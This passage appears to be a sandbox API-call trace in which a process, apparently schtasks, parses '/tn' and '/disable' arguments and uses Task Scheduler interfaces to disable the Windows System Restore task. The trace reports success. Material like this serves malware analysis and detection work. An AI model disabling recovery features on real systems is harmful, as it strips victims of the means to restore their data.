_BufferCount=0xa, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|disable|") returned 9 [0107.590] lstrlenW (lpString="|ru|") returned 4 [0107.590] lstrlenW (lpString="|disable|") returned 9 [0107.590] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.590] lstrlenW (lpString="rp") returned 2 [0107.590] lstrlenW (lpString="rp") returned 2 [0107.590] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.590] lstrlenW (lpString="disable") returned 7 [0107.590] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.590] _vsnwprintf (in: _Buffer=0x1523d3df5e0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|rp|") returned 4 [0107.590] _vsnwprintf (in: _Buffer=0x1523d3df240, _BufferCount=0xa, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|disable|") returned 9 [0107.590] lstrlenW (lpString="|rp|") returned 4 [0107.590] lstrlenW (lpString="|disable|") returned 9 [0107.590] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.590] lstrlenW (lpString="tn") returned 2 [0107.590] lstrlenW (lpString="tn") returned 2 [0107.590] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.590] lstrlenW (lpString="disable") returned 7 [0107.590] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.590] _vsnwprintf (in: _Buffer=0x1523d3df5e0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|tn|") returned 4 [0107.590] _vsnwprintf (in: _Buffer=0x1523d3df240, _BufferCount=0xa, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|disable|") returned 9 [0107.590] lstrlenW (lpString="|tn|") returned 4 [0107.590] lstrlenW (lpString="|disable|") returned 9 [0107.590] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.590] lstrlenW (lpString="tr") returned 2 [0107.590] lstrlenW (lpString="tr") returned 2 [0107.590] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.590] lstrlenW (lpString="disable") returned 7 [0107.590] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.590] _vsnwprintf (in: _Buffer=0x1523d3df5e0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|tr|") returned 4 [0107.591] _vsnwprintf (in: _Buffer=0x1523d3df240, _BufferCount=0xa, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|disable|") returned 9 [0107.591] lstrlenW (lpString="|tr|") returned 4 [0107.591] lstrlenW (lpString="|disable|") returned 9 [0107.591] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.591] lstrlenW (lpString="st") returned 2 [0107.591] lstrlenW (lpString="st") returned 2 [0107.591] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.591] lstrlenW (lpString="disable") returned 7 [0107.591] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.591] _vsnwprintf (in: _Buffer=0x1523d3df5e0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|st|") returned 4 [0107.591] _vsnwprintf (in: _Buffer=0x1523d3df240, _BufferCount=0xa, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|disable|") returned 9 [0107.591] lstrlenW (lpString="|st|") returned 4 [0107.591] lstrlenW (lpString="|disable|") returned 9 [0107.591] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.591] lstrlenW (lpString="sd") returned 2 [0107.591] lstrlenW (lpString="sd") returned 2 [0107.591] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.591] lstrlenW (lpString="disable") returned 7 [0107.591] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.591] _vsnwprintf (in: _Buffer=0x1523d3df5e0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|sd|") returned 4 [0107.591] _vsnwprintf (in: _Buffer=0x1523d3df240, _BufferCount=0xa, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|disable|") returned 9 [0107.591] lstrlenW (lpString="|sd|") returned 4 [0107.591] lstrlenW (lpString="|disable|") returned 9 [0107.591] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.591] lstrlenW (lpString="ed") returned 2 [0107.591] lstrlenW (lpString="ed") returned 2 [0107.591] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.591] lstrlenW (lpString="disable") returned 7 [0107.591] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.591] _vsnwprintf (in: _Buffer=0x1523d3df5e0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|ed|") returned 4 [0107.591] _vsnwprintf (in: _Buffer=0x1523d3df240, _BufferCount=0xa, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|disable|") returned 9 [0107.591] lstrlenW (lpString="|ed|") returned 4 [0107.591] lstrlenW (lpString="|disable|") returned 9 [0107.591] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.591] lstrlenW (lpString="it") returned 2 [0107.592] lstrlenW (lpString="it") returned 2 [0107.592] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.592] lstrlenW (lpString="disable") returned 7 [0107.592] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.592] _vsnwprintf (in: _Buffer=0x1523d3df5e0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|it|") returned 4 [0107.592] _vsnwprintf (in: _Buffer=0x1523d3df240, _BufferCount=0xa, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|disable|") returned 9 [0107.592] lstrlenW (lpString="|it|") returned 4 [0107.592] lstrlenW (lpString="|disable|") returned 9 [0107.592] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.592] lstrlenW (lpString="et") returned 2 [0107.592] lstrlenW (lpString="et") returned 2 [0107.592] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.592] lstrlenW (lpString="disable") returned 7 [0107.592] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.592] _vsnwprintf (in: _Buffer=0x1523d3df5e0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|et|") returned 4 [0107.592] _vsnwprintf (in: _Buffer=0x1523d3df240, _BufferCount=0xa, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|disable|") returned 9 [0107.592] lstrlenW (lpString="|et|") returned 4 [0107.592] lstrlenW (lpString="|disable|") returned 9 [0107.592] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.592] lstrlenW (lpString="k") returned 1 [0107.592] lstrlenW (lpString="k") returned 1 [0107.592] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.592] lstrlenW (lpString="disable") returned 7 [0107.592] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.592] _vsnwprintf (in: _Buffer=0x1523d3df5e0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|k|") returned 3 [0107.592] _vsnwprintf (in: _Buffer=0x1523d3df240, _BufferCount=0xa, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|disable|") returned 9 [0107.592] lstrlenW (lpString="|k|") returned 3 [0107.592] lstrlenW (lpString="|disable|") returned 9 [0107.592] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.592] lstrlenW (lpString="du") returned 2 [0107.592] lstrlenW (lpString="du") returned 2 [0107.592] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.593] lstrlenW (lpString="disable") returned 7 [0107.593] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.593] _vsnwprintf (in: _Buffer=0x1523d3df5e0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|du|") returned 4 [0107.593] _vsnwprintf (in: _Buffer=0x1523d3df240, _BufferCount=0xa, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|disable|") returned 9 [0107.593] lstrlenW (lpString="|du|") returned 4 [0107.593] lstrlenW (lpString="|disable|") returned 9 [0107.593] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.594] lstrlenW (lpString="enable") returned 6 [0107.594] lstrlenW (lpString="enable") returned 6 [0107.594] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.594] lstrlenW (lpString="disable") returned 7 [0107.594] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.594] _vsnwprintf (in: _Buffer=0x1523d3df5e0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|enable|") returned 8 [0107.594] _vsnwprintf (in: _Buffer=0x1523d3df240, _BufferCount=0xa, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|disable|") returned 9 [0107.594] lstrlenW (lpString="|enable|") returned 8 [0107.594] lstrlenW (lpString="|disable|") returned 9 [0107.594] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.594] lstrlenW (lpString="disable") returned 7 [0107.594] lstrlenW (lpString="disable") returned 7 [0107.594] _memicmp (_Buf1=0x1523d3df420, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.594] lstrlenW (lpString="disable") returned 7 [0107.594] _memicmp (_Buf1=0x1523d3df4c0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0107.594] _vsnwprintf (in: _Buffer=0x1523d3df5e0, _BufferCount=0xa, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|disable|") returned 9 [0107.594] _vsnwprintf (in: _Buffer=0x1523d3df240, _BufferCount=0xa, _Format="|%s|", _ArgList=0x1b4a07da88 | out: _Buffer="|disable|") returned 9 [0107.594] lstrlenW (lpString="|disable|") returned 9 [0107.594] lstrlenW (lpString="|disable|") returned 9 [0107.594] StrStrIW (lpFirst="|disable|", lpSrch="|disable|") returned="|disable|" [0107.594] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.594] RtlRestoreLastWin32Error () returned 0x1b49e0f000 [0107.594] GetProcessHeap () returned 0x1523d3d0000 [0107.594] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x1fc) returned 0x1523d3e1910 [0107.594] GetProcessHeap () returned 0x1523d3d0000 [0107.594] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x1fc) returned 0x1523d3e1b20 [0107.594] GetProcessHeap () returned 0x1523d3d0000 [0107.594] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x1fc) returned 0x1523d3e1d30 [0107.594] GetProcessHeap () returned 0x1523d3d0000 [0107.594] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x18) returned 0x1523d3df2c0 [0107.594] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0107.599] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0108.404] CoCreateInstance (in: rclsid=0x7ff78ab28038*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x7ff78ab28048*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x1b4a07cdc0 | out: ppv=0x1b4a07cdc0*=0x1523d5458c0) returned 0x0 [0108.734] TaskScheduler:ITaskService:Connect (This=0x1523d5458c0, serverName=0x1b4a07cea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), user=0x1b4a07ce80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), domain=0x1b4a07ce60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), password=0x1b4a07ce40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)) returned 0x0 [0110.921] TaskScheduler:ITaskService:GetFolder (in: This=0x1523d5458c0, Path=0x0, ppFolder=0x1b4a07cf60 | out: ppFolder=0x1b4a07cf60*=0x1523d545a70) returned 0x0 [0110.922] GetThreadLocale () returned 0x409 [0110.922] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="\\Microsoft\\Windows\\SystemRestore\\SR", cchCount1=-1, lpString2="*", cchCount2=-1) returned 3 [0110.922] ITaskFolder:GetTask (in: This=0x1523d545a70, Path="\\Microsoft\\Windows\\SystemRestore\\SR", ppTask=0x1b4a07ce50 | out: ppTask=0x1b4a07ce50*=0x1523d545af0) returned 0x0 [0110.924] lstrlenW (lpString="\\Microsoft\\Windows\\SystemRestore\\SR") returned 35 [0110.924] GetProcessHeap () returned 0x1523d3d0000 [0110.924] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x48) returned 0x1523d3f4270 [0110.924] GetProcessHeap () returned 0x1523d3d0000 [0110.924] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x20) returned 0x1523d3f01e0 [0110.924] IUnknown:Release (This=0x1523d545af0) returned 0x0 [0110.924] ITaskFolder:GetTask (in: This=0x1523d545a70, Path="\\Microsoft\\Windows\\SystemRestore\\SR", ppTask=0x1b4a07cf58 | out: ppTask=0x1b4a07cf58*=0x1523d545af0) returned 0x0 [0110.925] IRegisteredTask:get_Enabled (in: This=0x1523d545af0, pEnabled=0x1b4a07cf78 | out: pEnabled=0x1b4a07cf78*=0xffff) returned 0x0 [0110.925] IRegisteredTask:put_Enabled (This=0x1523d545af0, Enabled=0) returned 0x0 [0120.641] GetProcessHeap () returned 0x1523d3d0000 [0120.641] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x20) returned 0x1523d3efc40 [0120.641] _memicmp (_Buf1=0x1523d3df3e0, _Buf2=0x7ff78ab28080, _Size=0x7) returned 0 [0120.641] LoadStringW (in: hInstance=0x0, uID=0x12f, lpBuffer=0x1523d3e2bd0, cchBufferMax=256 | out: lpBuffer="SUCCESS: The parameters of scheduled task \"%s\" have been changed.\n") returned 0x42 [0120.642] lstrlenW (lpString="SUCCESS: The parameters of scheduled task \"%s\" have been changed.\n") returned 66 [0120.642] GetProcessHeap () returned 0x1523d3d0000 [0120.642] RtlAllocateHeap (HeapHandle=0x1523d3d0000, Flags=0xc, Size=0x86) returned 0x1523d3f1c10 [0120.642] _vsnwprintf (in: _Buffer=0x1b4a07d0c0, _BufferCount=0x1db, _Format="SUCCESS: The parameters of scheduled task \"%s\" have been changed.\n", _ArgList=0x1b4a07cf08 | out: _Buffer="SUCCESS: The parameters of scheduled task \"\\Microsoft\\Windows\\SystemRestore\\SR\" have been changed.\n") returned 99 [0120.642] __iob_func () returned 0x7ffcea2dea00 [0120.642] _fileno (_File=0x7ffcea2dea30) returned 1 [0120.642] _errno () returned 0x1523d540850 [0120.642] _get_osfhandle (_FileHandle=1) returned 0x50 [0120.642] _errno () returned 0x1523d540850 [0120.642] GetFileType (hFile=0x50) returned 0x2 [0120.642] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0120.642] GetFileType (hFile=0x50) returned 0x2 [0120.642] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x1b4a07ce80 | out: lpMode=0x1b4a07ce80) returned 1 [0120.653] __iob_func () returned 0x7ffcea2dea00 [0120.653] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0120.653] lstrlenW (lpString="SUCCESS: The parameters of scheduled task \"\\Microsoft\\Windows\\SystemRestore\\SR\" have been changed.\n") returned 99 [0120.653] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x1b4a07d0c0*, nNumberOfCharsToWrite=0x63, lpNumberOfCharsWritten=0x1b4a07cef0, lpReserved=0x0 | out: lpBuffer=0x1b4a07d0c0*, lpNumberOfCharsWritten=0x1b4a07cef0*=0x63) returned 1 [0120.655] IUnknown:Release (This=0x1523d545af0) returned 0x0 [0120.655] TaskScheduler:IUnknown:Release (This=0x1523d545a70) returned 0x0 [0120.655] TaskScheduler:IUnknown:Release (This=0x1523d5458c0) returned 0x0 [0120.655] GetProcessHeap () returned 0x1523d3d0000 [0120.655] GetProcessHeap () returned 0x1523d3d0000 [0120.655] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3e1d30) returned 1 [0120.655] GetProcessHeap () returned 0x1523d3d0000 [0120.655] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3e1d30) returned 0x1fc [0120.655] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3e1d30) returned 1 [0120.655] GetProcessHeap () returned 0x1523d3d0000 [0120.655] GetProcessHeap () returned 0x1523d3d0000 [0120.655] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3e1910) returned 1 [0120.655] GetProcessHeap () returned 0x1523d3d0000 [0120.655] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3e1910) returned 0x1fc [0120.655] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3e1910) returned 1 [0120.655] GetProcessHeap () returned 0x1523d3d0000 [0120.655] GetProcessHeap () returned 0x1523d3d0000 [0120.655] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3e1b20) returned 1 [0120.655] GetProcessHeap () returned 0x1523d3d0000 [0120.655] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3e1b20) returned 0x1fc [0120.655] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3e1b20) returned 1 [0120.655] GetProcessHeap () returned 0x1523d3d0000 [0120.655] GetProcessHeap () returned 0x1523d3d0000 [0120.655] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3df800) returned 1 [0120.655] GetProcessHeap () returned 0x1523d3d0000 [0120.655] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3df800) returned 0x16 [0120.656] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3df800) returned 1 [0120.656] GetProcessHeap () returned 0x1523d3d0000 [0120.656] GetProcessHeap () returned 0x1523d3d0000 [0120.656] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3df6e0) returned 1 [0120.656] GetProcessHeap () returned 0x1523d3d0000 [0120.656] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3df6e0) returned 0x18 [0120.656] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3df6e0) returned 1 [0120.656] GetProcessHeap () returned 0x1523d3d0000 [0120.656] GetProcessHeap () returned 0x1523d3d0000 [0120.656] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3dfd10) returned 1 [0120.656] GetProcessHeap () returned 0x1523d3d0000 [0120.656] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3dfd10) returned 0x20 [0120.656] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3dfd10) returned 1 [0120.656] GetProcessHeap () returned 0x1523d3d0000 [0120.656] GetProcessHeap () returned 0x1523d3d0000 [0120.656] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3d5100) returned 1 [0120.656] GetProcessHeap () returned 0x1523d3d0000 [0120.656] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3d5100) returned 0xa0 [0120.656] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3d5100) returned 1 [0120.656] GetProcessHeap () returned 0x1523d3d0000 [0120.656] GetProcessHeap () returned 0x1523d3d0000 [0120.656] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3df900) returned 1 [0120.656] GetProcessHeap () returned 0x1523d3d0000 [0120.656] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3df900) returned 0x18 [0120.656] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3df900) returned 1 [0120.656] GetProcessHeap () returned 0x1523d3d0000 [0120.656] GetProcessHeap () returned 0x1523d3d0000 [0120.656] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3e0100) returned 1 [0120.656] GetProcessHeap () returned 0x1523d3d0000 [0120.656] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3e0100) returned 0x20 [0120.656] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3e0100) returned 1 [0120.656] GetProcessHeap () returned 0x1523d3d0000 [0120.656] GetProcessHeap () returned 0x1523d3d0000 [0120.656] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3e09f0) returned 1 [0120.656] GetProcessHeap () returned 0x1523d3d0000 [0120.656] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3e09f0) returned 0x208 [0120.656] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3e09f0) returned 1 [0120.656] GetProcessHeap () returned 0x1523d3d0000 [0120.656] GetProcessHeap () returned 0x1523d3d0000 [0120.656] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3df8e0) returned 1 [0120.656] GetProcessHeap () returned 0x1523d3d0000 [0120.656] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3df8e0) returned 0x18 [0120.657] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3df8e0) returned 1 [0120.657] GetProcessHeap () returned 0x1523d3d0000 [0120.657] GetProcessHeap () returned 0x1523d3d0000 [0120.657] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3e0070) returned 1 [0120.657] GetProcessHeap () returned 0x1523d3d0000 [0120.657] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3e0070) returned 0x20 [0120.657] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3e0070) returned 1 [0120.657] GetProcessHeap () returned 0x1523d3d0000 [0120.657] GetProcessHeap () returned 0x1523d3d0000 [0120.657] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3e2bd0) returned 1 [0120.657] GetProcessHeap () returned 0x1523d3d0000 [0120.657] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3e2bd0) returned 0x200 [0120.657] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3e2bd0) returned 1 [0120.657] GetProcessHeap () returned 0x1523d3d0000 [0120.657] GetProcessHeap () returned 0x1523d3d0000 [0120.657] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3df3e0) returned 1 [0120.657] GetProcessHeap () returned 0x1523d3d0000 [0120.657] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3df3e0) returned 0x18 [0120.657] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3df3e0) returned 1 [0120.657] GetProcessHeap () returned 0x1523d3d0000 [0120.657] GetProcessHeap () returned 0x1523d3d0000 [0120.657] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3dfd40) returned 1 [0120.657] GetProcessHeap () returned 0x1523d3d0000 [0120.657] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3dfd40) returned 0x20 [0120.657] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3dfd40) returned 1 [0120.657] GetProcessHeap () returned 0x1523d3d0000 [0120.657] GetProcessHeap () returned 0x1523d3d0000 [0120.657] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3df240) returned 1 [0120.657] GetProcessHeap () returned 0x1523d3d0000 [0120.657] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3df240) returned 0x16 [0120.657] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3df240) returned 1 [0120.657] GetProcessHeap () returned 0x1523d3d0000 [0120.657] GetProcessHeap () returned 0x1523d3d0000 [0120.657] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3df4c0) returned 1 [0120.657] GetProcessHeap () returned 0x1523d3d0000 [0120.657] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3df4c0) returned 0x18 [0120.657] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3df4c0) returned 1 [0120.657] GetProcessHeap () returned 0x1523d3d0000 [0120.657] GetProcessHeap () returned 0x1523d3d0000 [0120.657] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3d8800) returned 1 [0120.657] GetProcessHeap () returned 0x1523d3d0000 [0120.657] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3d8800) returned 0x20 [0120.658] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3d8800) returned 1 [0120.658] GetProcessHeap () returned 0x1523d3d0000 [0120.658] GetProcessHeap () returned 0x1523d3d0000 [0120.658] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3df5e0) returned 1 [0120.658] GetProcessHeap () returned 0x1523d3d0000 [0120.658] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3df5e0) returned 0x16 [0120.658] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3df5e0) returned 1 [0120.658] GetProcessHeap () returned 0x1523d3d0000 [0120.658] GetProcessHeap () returned 0x1523d3d0000 [0120.658] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3df420) returned 1 [0120.658] GetProcessHeap () returned 0x1523d3d0000 [0120.658] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3df420) returned 0x18 [0120.658] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3df420) returned 1 [0120.658] GetProcessHeap () returned 0x1523d3d0000 [0120.658] GetProcessHeap () returned 0x1523d3d0000 [0120.658] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3d87d0) returned 1 [0120.658] GetProcessHeap () returned 0x1523d3d0000 [0120.658] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3d87d0) returned 0x20 [0120.658] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3d87d0) returned 1 [0120.658] GetProcessHeap () returned 0x1523d3d0000 [0120.658] GetProcessHeap () returned 0x1523d3d0000 [0120.658] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3ddbf0) returned 1 [0120.658] GetProcessHeap () returned 0x1523d3d0000 [0120.658] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3ddbf0) returned 0x2 [0120.658] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3ddbf0) returned 1 [0120.658] GetProcessHeap () returned 0x1523d3d0000 [0120.658] 